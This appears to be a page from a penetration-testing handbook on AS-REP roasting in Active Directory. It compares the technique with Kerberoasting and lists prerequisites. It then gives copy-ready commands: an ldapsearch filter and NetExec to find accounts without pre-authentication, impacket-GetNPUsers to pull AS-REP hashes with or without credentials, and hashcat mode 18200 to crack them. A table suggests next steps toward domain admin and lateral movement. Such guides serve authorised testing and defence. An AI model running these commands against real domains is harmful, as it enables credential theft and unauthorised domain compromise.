Handbook

AS-REP Roasting

Updated 29 Sept 2026Services✎ Suggest a change
On this page

Comparison to Kerberoasting

AS-REP RoastingKerberoasting
Credentials neededNone or low privLow priv required
TargetAccounts with pre-auth disabledAccounts with SPNs
Ticket typeAS-REP (TGT response)TGS (service ticket)
Hashcat mode1820013100
Account typeAny userService accounts

Prerequisites

  • Username list OR low-privilege domain credentials
  • At least one account with pre-auth disabled

Attack Flow

plain text
Identify accounts with pre-auth disabled (BloodHound / ldapsearch / GetNPUsers)
→ Request AS-REP ticket — no password needed
→ DC returns AS-REP encrypted with account's password hash
→ Crack offline (Hashcat mode 18200) → recover plaintext password

Step 0 - Identify Vulnerable Accounts

bash
# BloodHound query: Find AS-REP Roastable Users

ldapsearch -x -H ldap://<dc-ip> \
    -D '<username>@<domain.local>' \
    -w '<password>' \
    -b "DC=<domain>,DC=local" \
    "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
    sAMAccountName

nxc ldap <dc-ip> -u <username> -p <password> --asreproast /tmp/asrep_check.txt

Step 1 - Request AS-REP Tickets

With credentials:

bash
impacket-GetNPUsers \
    '<domain.local>/<username>:<password>' \
    -dc-ip <dc-ip> \
    -request \
    -outputfile asrep_hashes.txt

# Specific account list
impacket-GetNPUsers \
    '<domain.local>/<username>:<password>' \
    -dc-ip <dc-ip> \
    -request \
    -usersfile userlist.txt \
    -outputfile asrep_hashes.txt

Without credentials (username list only):

bash
impacket-GetNPUsers \
    '<domain.local>/' \
    -dc-ip <dc-ip> \
    -no-pass \
    -usersfile userlist.txt \
    -outputfile asrep_hashes.txt

Via NetExec:

bash
nxc ldap <dc-ip> -u <username> -p <password> --asreproast /tmp/asrep_hashes.txt

# Without credentials
nxc ldap <dc-ip> -u userlist.txt -p '' --asreproast /tmp/asrep_hashes.txt

Step 2 - Crack the Hashes

bash
hashcat -m 18200 asrep_hashes.txt <wordlist>

hashcat -m 18200 asrep_hashes.txt <wordlist> -r /usr/share/hashcat/rules/best64.rule

hashcat -m 18200 asrep_hashes.txt --show

What Each Result Tells You

FindingImplication
Accounts with pre-auth disabled foundAttempt roasting immediately
High privilege account is roastableCritical — likely path to DA
Hash crackedPass the password across subnet via nxc
Not cracked with rockyouTry larger wordlist or rules
No accounts foundMove to Kerberoasting

Flag Reference

impacket-GetNPUsers

FlagMeaning
<domain>/<user>:<pass>Credentials to authenticate to DC
-dc-ipDC IP
-requestRequest AS-REP tickets
-no-passRun without credentials — needs username list
-usersfileUsernames to test
-outputfileSave hashes

nxc

FlagMeaning
ldapUse LDAP protocol
--asreproast <file>Run AS-REP roasting, save to file